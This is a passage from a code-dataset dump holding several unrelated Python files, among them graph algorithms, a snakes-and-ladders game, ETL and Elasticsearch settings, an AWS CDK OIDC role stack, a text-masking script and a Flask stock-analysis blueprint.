\n\n# Recursive construction of a depth-first spanning forest\ndef DFS_span_forest(graph):\n    vnum = graph.vertex_num()\n    span_forest = [None] * vnum\n\n    def dfs(graph, v):  # recursive traversal, recording the tree edge used to reach each vertex\n        nonlocal span_forest  # span_forest is nonlocal\n        for u, w in graph.out_edges(v):\n            if span_forest[u] is None:\n                span_forest[u] = (v, w)\n                dfs(graph, u)\n\n    for v in range(vnum):\n        if span_forest[v] is None:\n            span_forest[v] = (v, 0)\n            dfs(graph, v)\n\n    return span_forest\n\n# Minimum spanning tree algorithms\n# Kruskal's algorithm\ndef Kruskal(graph):\n    vnum = graph.vertex_num()\n    reps = [i for i in range(vnum)]\n    mst, edges = [], []\n    for vi in range(vnum):\n        for v, w in graph.out_edges(vi):\n            edges.append((w, vi, v))\n            # w is the weight, vi and v are the endpoints\n    edges.sort()\n    # sorting lets us take edges in order of increasing weight\n    for w, vi, vj in edges:\n        if reps[vi] != reps[vj]:\n            mst.append((vi, vj, w))\n            if len(mst) == vnum - 1:\n                break\n            rep, orep = reps[vi], reps[vj]\n            for i in range(vnum):\n                if reps[i] == orep:\n                    reps[i] = rep\n    return mst\n\n# Prim's algorithm\n# Based on the minimum spanning tree property\n# Priority queue\nclass PrioQueueError(ValueError):\n    pass\n\nclass PrioQue:\n    def __init__(self, elist=()):\n        self._elems = list(elist)\n        self._elems.sort(reverse=True)\n\n    def enqueue(self, e):\n        i = len(self._elems) - 1\n        while i >= 0:\n            if self._elems[i] <= e:\n                i -= 1\n            else:\n                break\n        self._elems.insert(i+1, e)\n\n    def is_empty(self):\n        return not self._elems\n\n    def peek(self):\n        if self.is_empty():\n            raise PrioQueueError(\"in top\")\n        return self._elems[-1]\n\n    def dequeue(self):\n        if self.is_empty():\n            raise PrioQueueError(\"in pop\")\n        return self._elems.pop()\n\ndef Prim(graph):\n    vnum = graph.vertex_num()\n    mst = [None] * vnum\n    cands = PrioQue([(0, 0, 0)])\n    count = 0\n    while count < vnum and not cands.is_empty():\n        w, u, v = cands.dequeue()\n        if mst[v]:\n            continue\n        mst[v] = ((u, v), w)\n        count += 1\n        for vi, w in graph.out_edges(v):\n            if not mst[vi]:\n                cands.enqueue((w, v, vi))\n    return mst\n\n# Dijkstra's algorithm for single-source shortest paths\ndef dijikstra_shortest_paths(graph, v0):\n    vnum = graph.vertex_num()\n    assert 0 <= v0 < vnum\n    paths = [None] * vnum\n    count = 0\n    cands = PrioQue([(0, v0, v0)])\n    # initial candidate queue\n    while count < vnum and not cands.is_empty():\n        # take the vertex with the shortest known path\n        plen, u, vmin = cands.dequeue()\n        if paths[vmin]:\n            # its shortest path is already fixed, skip it\n            continue\n        paths[vmin] = (u, plen)\n        # record the newly determined shortest path\n        for v, w in graph.out_edges(vmin):\n            if not paths[v]:\n                cands.enqueue((plen + w, vmin, v))\n        count += 1\n    return paths\n\n\n# Floyd's algorithm (all-pairs shortest paths)\ndef all_shortest_paths(graph):\n    vnum = graph.vertex_num()\n    a = [[graph.get_edge(i,j) for j in range(vnum)]\n         for i in range(vnum)]  # create a copy\n    nvertex = [[-1 if a[i][j] == inf else j\n                for j in range(vnum)]\n               for i in range(vnum)]\n    for k in range(vnum):\n        for i in range(vnum):\n            for j in range(vnum):\n                if a[i][j] > a[i][k] + a[k][j]:\n                    a[i][j] = a[i][k] + a[k][j]\n                    nvertex[i][j] = nvertex[i][k]\n    return (a, nvertex)\n# a records the known shortest path lengths, nvertex the next vertex on each shortest path\n\n\n# Bellman-Ford: single-source shortest paths that allows negative edge weights,\n# covering the case Dijkstra's algorithm cannot handle\n\n\n# Topological sort of an AOV network\ndef topsort(graph):\n    vnum = graph.vertex_num()\n    indegree, toposeq = [0]*vnum, []\n    zerov = -1\n    for vi in range(vnum):\n        for v, w in graph.out_edges(vi):\n            indegree[v] += 1\n    for vi in range(vnum):\n        if indegree[vi] == 0:\n            indegree[vi] = zerov\n            zerov = vi\n    for n in range(vnum):\n        if zerov == -1:\n            return False\n        vi = zerov\n        zerov = indegree[zerov]\n        toposeq.append(vi)\n        for v, w in graph.out_edges(vi):\n            indegree[v] -= 1\n            if indegree[v] == 0:\n                indegree[v] = zerov\n                zerov = v\n    return toposeq\n\n\n# Critical paths of an AOE network\n# ee[j]: earliest time event vj can occur\n# le[j]: latest time event vj may occur\n\ndef critical_paths(graph):\n    def events_earliest_time(vnum, graph, toposeq):\n        ee = [0] * vnum\n        for i in toposeq:\n            for j, w in graph.out_edges(i):\n                if ee[i] + w > ee[j]:\n                    ee[j] = ee[i] + w\n        return ee\n\n    def event_latest_time(vnum, graph, toposeq, eelast):\n        le = [eelast] * vnum\n        for k in range(vnum-2, -1, -1):\n            i = toposeq[k]\n            for j, w in graph.out_edges(i):\n                if le[j]
- w < le[i]:\n le[i] = le[j] - w\n return le\n\n def crt_paths(vnum, graph, ee, le):\n crt_Actions = []\n for i in range(vnum):\n for j, w in graph.out_edges(i):\n if ee[i] == le[j] - w:\n crt_Actions.append((i, j, ee[i]))\n return crt_Actions\n\n toposeq = topsort(graph)\n if not toposeq:\n return False\n vnum = graph.vertex_num()\n ee = events_earliest_time(vnum, graph, toposeq)\n le = event_latest_time(vnum, graph, toposeq, ee[vnum-1])\n return crt_paths(vnum, graph, ee, le)\n\n\n\n\n\n\nif __name__ == \"__main__\":\n print(\"start to build a graph\")\n mat = [[0,0,1], [1, 0, 1], [0, 1, 0]]\n g = Graph(mat)\n print(g.vertex_num())\n g.add_edge(1, 2, 3)\n print(str(g))\n g_al = GraphAL(mat)\n print(str(g_al))\n\n span_forest = DFS_span_forest(g_al)\n print(span_forest)\n\n print(\"MST\",Kruskal(g_al))\n print(Prim(g_al))\n\n print(\"path:\", dijikstra_shortest_paths(g_al, 0))\n\n print(all_shortest_paths(g))\n print('--------------------')\n mat2 = [[0, 30, inf, 10, 50],[inf, 0, 60, inf, 80], [inf, inf, 0, inf, inf],\n [inf, inf, inf, 0, 30], [50, inf, 40, inf, 0]]\n\n g = Graph(mat2)\n print(all_shortest_paths(g))\n print('--------------------')\n g_al = GraphAL(mat2)\n print(all_shortest_paths(g_al))\n","repo_name":"NeilWangziyu/crawler","sub_path":"python_struction_6_graph.py","file_name":"python_struction_6_graph.py","file_ext":"py","file_size_in_byte":11389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38394848606","text":"import sys\r\nsys.path.append(sys.path[0]+'\\models')\r\n\r\nfrom board import board\r\nfrom dice import dice\r\nfrom player import player\r\nfrom ladder import ladder\r\nfrom piece import piece\r\nfrom snake import snake\r\n\r\nb=board()\r\nd=dice()\r\ns=int(input()) #number of snakes\r\nsnake=[]\r\nfor i in range(s):\r\n snake.append([int(x) for x in input().split(' ')])\r\n\r\nl=int(input()) #numbr of ladders\r\nladder=[]\r\nfor i in range(l):\r\n ladder.append([int(x) for x in input().split(' ')])\r\n\r\nfor m in snake:\r\n b.placeSnake(m[0],m[1])\r\n\r\nfor l in ladder:\r\n b.placeLadder(l[0],l[1])\r\n\r\np=int(input()) #number of players\r\n\r\nplayers=[]\r\nfor i in range(p):\r\n p1=player()\r\n p1.createPlayer(input())\r\n p1.allotApiece()\r\n players.append(p1)\r\n\r\nflag=0\r\nwhile not flag:\r\n i=0\r\n for p in players:\r\n v=p.rollDice(d)\r\n flag=b.movePiece(p.owns,v)\r\n if flag==1:\r\n break\r\n","repo_name":"salonicodes/Snakes-And-Ladders","sub_path":"SnakesAndLadders.py","file_name":"SnakesAndLadders.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"2141718608","text":"import os\n\nfrom dotenv import load_dotenv\nfrom pydantic import BaseSettings, Field\n\n\nclass PostgresBaseSettingsSettings(BaseSettings):\n dbname: str\n user: str = Field(env=\"dbuser\")\n password: str\n host: str\n port: int\n\n class Config:\n env_file = \".env\"\n\n\nclass PostgresDevSettings(PostgresBaseSettingsSettings):\n class Config:\n env_file = \"dev.env\"\n\n\nclass PostgresProdSettings(PostgresBaseSettingsSettings):\n class Config:\n env_file = \".env\"\n\n\nclass RedisBaseSettings(BaseSettings):\n host: str = Field(env=\"redis_host\")\n port: int = Field(env=\"redis_port\")\n\n class Config:\n env_file = \".env\"\n\n\nclass RedisDevSettings(RedisBaseSettings):\n class Config:\n env_file = \"dev.env\"\n\n\nclass RedisProdSettings(RedisBaseSettings):\n class Config:\n env_file = \".env\"\n\n\nclass 
ESBaseSettings(BaseSettings):\n host: str = Field(env=\"es_host\")\n\n class Config:\n env_file = \".env\"\n\n\nclass ESDevSettings(ESBaseSettings):\n class Config:\n env_file = \"dev.env\"\n\n\nclass ESProdSettings(ESBaseSettings):\n class Config:\n env_file = \".env\"\n\n\nclass Settings(BaseSettings):\n \"\"\"Settings for establishing all connections.\"\"\"\n\n pg_config = dict(dev=PostgresDevSettings, prod=PostgresProdSettings)\n pg_params: PostgresBaseSettingsSettings = pg_config[\n os.environ.get(\"ENV\", \"dev\").lower()\n ]()\n\n redis_config = dict(dev=RedisDevSettings, prod=RedisProdSettings)\n redis_params: RedisBaseSettings = redis_config[\n os.environ.get(\"ENV\", \"dev\").lower()\n ]()\n\n es_config = dict(dev=ESDevSettings, prod=ESProdSettings)\n es_params: ESBaseSettings = es_config[os.environ.get(\"ENV\", \"dev\").lower()]()\n\n class Config:\n env_file = \".env\"\n\n\ndef get_connection_params():\n \"\"\"Returns all connection parameters as dict.\"\"\"\n load_dotenv()\n dsl = {\n \"dbname\": os.environ.get(\"dbname\"),\n \"user\": os.environ.get(\"user\"),\n \"password\": os.environ.get(\"password\"),\n \"host\": os.environ.get(\"host\"),\n \"port\": int(os.environ.get(\"port\")),\n }\n\n es_params = os.environ.get(\"es_host\")\n\n redis_params = {\n \"host\": os.environ.get(\"redis_host\"),\n \"port\": os.environ.get(\"redis_port\"),\n }\n\n return {\"dsl\": dsl, \"es_params\": es_params, \"redis_params\": redis_params}\n\n\nsettings = Settings()\n\n\nbase_es_settings = {\n 'refresh_interval': '1s',\n 'analysis':\n {\n 'filter': {\n 'english_stop': {'type': 'stop', 'stopwords': '_english_'},\n 'english_stemmer': {'type': 'stemmer', 'language': 'english'},\n 'english_possessive_stemmer': {'type': 'stemmer', 'language': 'possessive_english'},\n 'russian_stop': {'type': 'stop', 'stopwords': '_russian_'},\n 'russian_stemmer': {'type': 'stemmer', 'language': 'russian'}\n },\n 'analyzer': {\n 'ru_en': {\n 'tokenizer': 'standard',\n 'filter': ['lowercase', 'english_stop', 'english_stemmer', 'english_possessive_stemmer',\n 'russian_stop', 'russian_stemmer']\n }\n }\n },\n}\n\nes_movies_mapping = {\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"imdb_rating\": {\"type\": \"float\"},\n \"title\": {\n \"type\": \"text\",\n \"analyzer\": \"ru_en\",\n \"fields\": {\"raw\": {\"type\": \"keyword\"}},\n },\n \"description\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n \"director\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n \"actors_names\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n \"writers_names\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n \"genre\": {\n \"type\": \"nested\",\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"name\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n },\n },\n \"directors\": {\n \"type\": \"nested\",\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"name\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n },\n },\n \"actors\": {\n \"type\": \"nested\",\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"name\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n },\n },\n \"writers\": {\n \"type\": \"nested\",\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"name\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n },\n },\n \"modified\": {\n \"type\": \"date\"\n }\n },\n}\n\nes_genres_mapping = {\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": 
{\"type\": \"keyword\"},\n \"genre_name\": {\n \"type\": \"text\",\n \"analyzer\": \"ru_en\",\n \"fields\": {\"raw\": {\"type\": \"keyword\"}},\n },\n \"description\": {\"type\": \"keyword\"},\n \"modified\": {\n \"type\": \"date\"\n }\n },\n}\n\nes_persons_mapping = {\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"full_name\": {\n \"type\": \"text\",\n \"analyzer\": \"ru_en\",\n \"fields\": {\"raw\": {\"type\": \"keyword\"}},\n },\n \"modified\": {\n \"type\": \"date\"\n }\n },\n}\n\npg_es_index_name_with_mappings_dict = {\n \"movies\": es_movies_mapping,\n \"genres\": es_genres_mapping,\n \"persons\": es_persons_mapping\n}\n\n\nindex_to_tables_dict = {\n \"movies\": {\n \"table_name\": \"film_work\",\n \"select_query\": \"\"\"SELECT\n fw.id,\n fw.title,\n fw.description,\n fw.rating,\n fw.type,\n fw.created,\n fw.modified,\n COALESCE (\n json_agg(\n DISTINCT jsonb_build_object(\n 'person_role', pfw.role,\n 'person_id', p.id,\n 'person_name', p.full_name\n )\n ) FILTER (WHERE p.id is not null),\n '[]'\n ) as persons,\n COALESCE (\n json_agg(\n DISTINCT jsonb_build_object(\n 'genre_id', g.id,\n 'genre_name', g.name\n )\n ) FILTER (WHERE g.id is not null),\n '[]'\n ) as genres\n FROM content.film_work fw\n LEFT JOIN content.person_film_work pfw ON pfw.film_work_id = fw.id\n LEFT JOIN content.person p ON p.id = pfw.person_id\n LEFT JOIN content.genre_film_work gfw ON gfw.film_work_id = fw.id\n LEFT JOIN content.genre g ON g.id = gfw.genre_id\n WHERE fw.modified > %(state)s::timestamp OR p.modified > %(state)s::timestamp OR g.modified > %(state)s::timestamp\n GROUP BY fw.id\n ORDER BY fw.modified DESC;\n \"\"\",\n },\n \"persons\": {\n \"table_name\": \"person\",\n \"select_query\": \"\"\"SELECT\n p.id,\n p.full_name,\n p.modified\n FROM content.person p\n WHERE p.modified > %(state)s::timestamp\n GROUP BY p.id\n ORDER BY p.modified DESC;\n \"\"\",\n },\n \"genres\": {\n \"table_name\": \"genre\",\n \"select_query\": \"\"\"SELECT\n g.id,\n g.name,\n g.description,\n g.modified\n FROM content.genre g\n WHERE g.modified > %(state)s::timestamp \n GROUP BY g.id\n ORDER BY g.modified DESC;\n \"\"\",\n },\n}\n","repo_name":"Sladick/Async_API_sprint_1_29","sub_path":"etl/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31545263849","text":"\"\"\"\nCDK application entry point file.\n\"\"\"\nimport constructs\nfrom aws_cdk import App, CfnOutput, CfnParameter, Stack, aws_iam\n\n\nclass OidcProviderStack(Stack):\n def __init__(self, scope: constructs.Construct, construct_id: str) -> None:\n super().__init__(scope, construct_id)\n\n env_name = CfnParameter(self, \"EnvName\", type=\"String\", description=\"The environment to deploy the OidcProviderStack\")\n\n github_repo = CfnParameter(\n self,\n \"GithubRepo\",\n type=\"String\",\n description=\"Specify the parameters that limit which GitHub repo has access to AWS\",\n )\n\n aws_iam.OpenIdConnectProvider(\n self,\n \"GithubAwsOidcProvider\",\n url=\"https://token.actions.githubusercontent.com\",\n client_ids=[\"sts.amazonaws.com\"],\n )\n\n account_id = aws_iam.AccountRootPrincipal().account_id\n\n oidc_deploy_role = aws_iam.Role(\n self,\n \"OidcDeployRole\",\n role_name=f\"{env_name.value_as_string}Oidc\",\n assumed_by=aws_iam.WebIdentityPrincipal(\n f\"arn:aws:iam::{account_id}:oidc-provider/token.actions.githubusercontent.com\",\n {\n \"StringLike\": {\n 
\"token.actions.githubusercontent.com:aud\": [\"sts.amazonaws.com\"],\n \"token.actions.githubusercontent.com:sub\": [f\"repo:{github_repo.value_as_string}\"],\n }\n },\n ),\n )\n\n oidc_deploy_role.add_managed_policy(aws_iam.ManagedPolicy.from_aws_managed_policy_name(\"AdministratorAccess\"))\n\n # Set Cfn to output deploy_role arn post CDK deployment.\n # Assign or update this value in AWS_ASSUME_ROLE in GitHub secrets\n CfnOutput(self, \"ServiceAccountIamRole\", value=oidc_deploy_role.role_arn)\n\n\ndef main() -> None:\n app = App()\n\n OidcProviderStack(app, \"OidcProviderStack\")\n\n app.synth()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"linz/oidc-provider","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"24446851500","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def longestConsecutive(self, root: Optional[TreeNode]) -> int:\n def dfs(node, prev_val, cur_max):\n if not node:\n return cur_max\n new_max = cur_max + 1 if node.val == prev_val + 1 else 1\n return max(\n cur_max,\n dfs(node.left, node.val, new_max),\n dfs(node.right, node.val, new_max),\n )\n\n return dfs(root, float(\"-inf\"), 0)\n","repo_name":"lingduoduo/Leetcode","sub_path":"Leetcode/0298-Binary-Tree-Longest-Consecutive-Sequence.py","file_name":"0298-Binary-Tree-Longest-Consecutive-Sequence.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23678458471","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.core import serializers\nimport json\n\n\n@login_required\ndef ProfileData(request): # send all profile data\n user = request.user\n profile = user.profile\n json_data = serializers.serialize('json', [profile])\n json_data = json.loads(json_data)[0]\n del json_data['model']\n json_data['username'] = user.username\n json_data['email'] = user.email\n json_data['name'] = user.first_name\n json_data = json.dumps(json_data)\n return HttpResponse(json_data, content_type='json_comment_filtered')\n","repo_name":"anshika-V/eduHub","sub_path":"user/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"30446859010","text":"from os import listdir, path, mkdir\r\nfrom os.path import isfile, join\r\nimport importlib\r\nfrom nerm.configuration import Configuration\r\nfrom brat_parser import get_entities_relations_attributes_groups\r\n\r\ndef get_data_sequences(mask_input_file_location, filename):\r\n ann_data = get_entities_relations_attributes_groups( mask_input_file_location + filename + \".ann\")\r\n sequences = []\r\n for key,values in ann_data[0].items():\r\n data =(values.text,values.type, values.span[0][0],values.span[0][1])\r\n sequences.append(data)\r\n return sequences\r\n\r\n\r\ndef masking_process(type,result,new_text):\r\n for i in range(0, len(result)):\r\n if type[\"masking_type\"] == \"Mask\":\r\n masking_class = type['masking_class']\r\n plugin_module = importlib.import_module(\"mask.masking_plugins.\" + masking_class)\r\n class_masking = getattr(plugin_module, masking_class)\r\n masking_instance = 
class_masking()\r\n \r\n if result[i][1] == type[\"entity_name\"]:\r\n if type[\"masking_type\"] == \"Redact\":\r\n new_token = \"XXX\"\r\n elif type[\"masking_type\"] == \"Mask\":\r\n new_token = masking_instance.mask(result[i][0])\r\n old_token = result[i][0]\r\n new_text = new_text.replace(old_token, new_token)\r\n return new_text\r\n\r\n\r\ndef apply_masking(mask_input_file_location, filename, text, plugins):\r\n new_text = text\r\n for type in plugins:\r\n result = get_data_sequences(mask_input_file_location, filename[:-4])\r\n new_text = masking_process(type,result,new_text)\r\n return new_text\r\n\r\n\r\ndef main():\r\n print(\"\\n Welcome to NERM Group Masking \\n\")\r\n\r\n cf = Configuration()\r\n input_file_location = cf.mask_input_file_location\r\n\r\n data = [f for f in listdir(input_file_location) if f.startswith('unannotated_texts')]\r\n print(data)\r\n if (len(data)>0):\r\n input_file_location = input_file_location + data[0] + \"/brat/deploy/\"\r\n \r\n data = [f for f in listdir(input_file_location) if isfile(\r\n join(input_file_location, f))]\r\n print(data)\r\n\r\n plugins = []\r\n for entity in cf.entities_list:\r\n masking_type = entity['masking_type']\r\n entity_name = entity['entity_name']\r\n if masking_type == \"Redact\":\r\n masking_class = \"\"\r\n else:\r\n masking_class = entity['masking_class']\r\n\r\n plugins.append({\"masking_type\":masking_type, \"entity_name\":entity_name, \"masking_class\":masking_class})\r\n \r\n for file in data:\r\n if file.endswith(\".txt\"):\r\n text = open(input_file_location + file, 'r').read()\r\n new_text = apply_masking(input_file_location, file, text,plugins)\r\n\r\n # Write the output\r\n if not path.exists(cf.output_file_location):\r\n mkdir(cf.output_file_location)\r\n\r\n file_handler = open(cf.output_file_location + file, \"w\")\r\n file_handler.write(new_text)\r\n file_handler.close()\r\n\r\nif __name__==\"__main__\":\r\n main()\r\n","repo_name":"Renesa534/Healthcare_data_masking","sub_path":"mask/masking.py","file_name":"masking.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"75349110700","text":"import os\n\nfrom flask import (Blueprint, abort, current_app, flash, jsonify, make_response, redirect, render_template, request,\n url_for)\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_restful import (Api, Resource, fields, marshal, marshal_with, reqparse)\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, TextField, validators\n\nfrom common.data import AttributeDict\nfrom finance_components import FinanceComponents\nfrom services.StockAnalysis.StockCharts import StockCharts\n\nfc = FinanceComponents(cfg=None)\nstock_charts = StockCharts()\n\nauth = HTTPBasicAuth()\n\nAppName = os.path.basename(__file__).split('.')[0]\nAppBlueprint = Blueprint(AppName, __name__, template_folder='templates')\napi = Api(AppBlueprint)\n\ncontext = {}\nform_submit_variable = 'textboxInput'\n\nticker_list_from_db = fc.get_stock_ticker_list_from_db()\n\n\ndef set_up_app(choices=ticker_list_from_db):\n context['AppName'] = AppName\n context['AppNameAlias'] = 'Stock Analysis'\n context['title'] = 'Stock Analysis'\n context['choices'] = choices\n context['data'] = None\n context['menu_items'] = None\n context['form_submitted_value'] = None\n context['cfg'] = {}\n return context\n\n\nset_up_app()\n\n\nclass textBoxSubmitForm(FlaskForm):\n textboxInput = StringField('Ticker: ', [validators.DataRequired()])\n 
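# The field name must match form_submit_variable ('textboxInput') above; get_form_submitted_value() reads it back via request.form.get(form_submit_variable).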
submit = SubmitField('Submit')\n\n\n@AppBlueprint.route('/', methods=['GET', 'POST'])\ndef index():\n current_app.logger.debug(\"function name: {}; http request :{}\".format('index', request.method))\n\n if request.method in ['GET']:\n set_up_app()\n form = textBoxSubmitForm(request.form)\n template_path = AppName + '/' + 'index.html'\n return render_template(template_path, form=form, context=context)\n\n if request.method in ['POST']:\n ticker = get_form_submitted_value()\n url_path = url_for(AppName + '.' + 'app_menuitem', ticker=ticker, selectedMenuID='summary', _external=True)\n return redirect(url_path, code=302)\n\n\n@AppBlueprint.route('/<ticker>', methods=['GET'])\ndef app_ticker(ticker):\n current_app.logger.debug(\"function name: {}; http request :{}\".format('app_ticker', request.method))\n\n url_path = url_for(AppName + '.' + 'app_menuitem', ticker=ticker, selectedMenuID='summary', _external=True)\n return redirect(url_path, code=302)\n\n\n@AppBlueprint.route('/<ticker>/<selectedMenuID>', methods=['GET', 'POST'])\ndef app_menuitem(ticker, selectedMenuID):\n current_app.logger.debug(\"function name: {}; http request :{}\".format('app_menuitem', request.method))\n\n if request.method in ['POST']:\n ticker = get_form_submitted_value()\n url_path = url_for(AppName + '.' + 'app_menuitem',\n ticker=ticker,\n selectedMenuID=selectedMenuID,\n _external=True)\n return redirect(url_path, code=302)\n\n context_cfg_ticker = context['cfg'].get('ticker', None)\n if context_cfg_ticker != ticker:\n assign_stock_data_and_update_menu_items(ticker)\n\n form = textBoxSubmitForm(request.form)\n template_path = AppName + '/' + selectedMenuID + '.html'\n return render_template(template_path, form=form, context=context)\n\n\ndef get_form_submitted_value():\n form_submitted_value = request.form.get(form_submit_variable)\n current_app.logger.debug(\"Form Submitted ticker :{}\".format(form_submitted_value))\n\n if form_submitted_value is not None:\n if form_submitted_value != context['form_submitted_value']:\n context['form_submitted_value'] = form_submitted_value\n\n return form_submitted_value\n\n\ndef assign_stock_data_and_update_menu_items(ticker=None, test_flag=False):\n if ticker in ticker_list_from_db:\n context['data'] = {}\n context['title'] = ticker\n context['error'] = True\n if ticker is None:\n ticker = context['form_submitted_value']\n try:\n data_dict = fc.get_data_for_UI(ticker=ticker)\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Data from database for :{ticker} ... SUCCESS\".format(\n AppName, ticker))\n except:\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Data from database for :{ticker} ... FAIL\".format(\n AppName, ticker))\n\n try:\n context['cfg'] = fc.get_stock_analysis_UI_cfg(data_dict)\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Data assignment for :{ticker} ... SUCCESS\".format(\n AppName, ticker))\n except:\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Data assignment for :{ticker} ... FAIL\".format(\n AppName, ticker))\n\n try:\n plot_cfg = fc.get_stock_analysis_plot_cfg(data_dict)\n context['plot_data'] = stock_charts.get_plot_data(plot_cfg)\n context['error'] = False\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Plot data assignment for :{ticker} ... SUCCESS\".format(\n AppName, ticker))\n except:\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Plot data assignment for :{ticker} ... 
FAIL\".format(\n AppName, ticker))\n\n if not test_flag:\n context['menu_items'] = get_menu_items(ticker)\n else:\n if not test_flag:\n current_app.logger.error(f\"{AppName} UI, No ticker ticker in database :{ticker} ... FAIL\".format(\n AppName, ticker))\n\n\ndef get_menu_items(ticker):\n current_app.logger.debug(\"Update menu urls for ticker :{}\".format(ticker))\n menu_items = [\n {\n 'id': 'summary',\n 'href': \"{}/summary\",\n 'alias': 'Summary',\n },\n {\n 'id': 'insider',\n 'href': '{}/insider',\n 'alias': 'Insider Info',\n },\n {\n 'id': 'institution',\n 'href': '{}/institution',\n 'alias': 'Institution Info',\n },\n # {\n # 'id': 'technical',\n # 'href': '{}/technical',\n # 'alias': 'Technical Analysis',\n # },\n # {\n # 'id': 'options',\n # 'href': '{}/options',\n # 'alias': 'Option Analysis',\n # },\n # {\n # 'id': 'strategies',\n # 'href': '{}/strategies',\n # 'alias': 'Strategies',\n # },\n {\n 'id': 'updates',\n 'href': '{}/updates',\n 'alias': 'Updates',\n },\n ]\n for menu_item in menu_items:\n menu_item['href'] = url_for(AppName + '.' + 'app_menuitem',\n ticker=ticker,\n selectedMenuID=menu_item['id'],\n _external=True)\n return menu_items\n","repo_name":"vamseeachanta/stockhold","sub_path":"src/stockhold/common/StockAnalysis_lagacy.py","file_name":"StockAnalysis_lagacy.py","file_ext":"py","file_size_in_byte":6959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"3285218774","text":"import os\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ncsv_folder = \"Textchunks\"\r\nnpy_folder = \"Embedded Text\"\r\n\r\n# Get the sorted list of CSV and .npy files\r\ncsv_files = sorted([f for f in os.listdir(csv_folder) if f.endswith('.csv')])\r\nnpy_files = sorted([f for f in os.listdir(npy_folder) if f.endswith('.npy')])\r\n\r\n# Initialize empty DataFrame and NumPy array for concatenation\r\nconcatenated_csv = pd.DataFrame()\r\nconcatenated_npy = None\r\n\r\nfor csv_file, npy_file in zip(csv_files, npy_files):\r\n print(npy_file)\r\n # Read the CSV file and concatenate\r\n csv_path = os.path.join(csv_folder, csv_file)\r\n csv_data = pd.read_csv(csv_path, encoding='utf-8', escapechar='\\\\')\r\n concatenated_csv = pd.concat([concatenated_csv, csv_data], ignore_index=True)\r\n\r\n npy_path = os.path.join(npy_folder, npy_file)\r\n npy_data = np.load(npy_path)\r\n if concatenated_npy is None:\r\n concatenated_npy = npy_data\r\n else:\r\n concatenated_npy = np.concatenate([concatenated_npy, npy_data], axis=0)\r\n\r\n\r\n# Save the concatenated data to the base folder\r\nconcatenated_csv.to_csv(\"textchunks-originaltext.csv\", encoding='utf-8', escapechar='\\\\', index=False)\r\nnp.save(\"textchunks.npy\", concatenated_npy)\r\nprint(\"Files saved: textchunks-originaltext.csv and textchunks.npy\")\r\n# Print the dimensions of the concatenated files\r\nprint(f\"textchunks-originaltext.csv dimensions: {concatenated_csv.shape}\")\r\nprint(f\"textchunks.npy dimensions: {concatenated_npy.shape}\")\r\n\r\n","repo_name":"kevincure/All-Day-TA","sub_path":"CreateFinalData.py","file_name":"CreateFinalData.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"92"} +{"seq_id":"12254386149","text":"def is_anagram(first_string, second_string):\n string_one = merge_sort(list(first_string.lower()))\n string_two = merge_sort(list(second_string.lower()))\n\n if first_string == '' or second_string == '' or string_one != string_two:\n return 
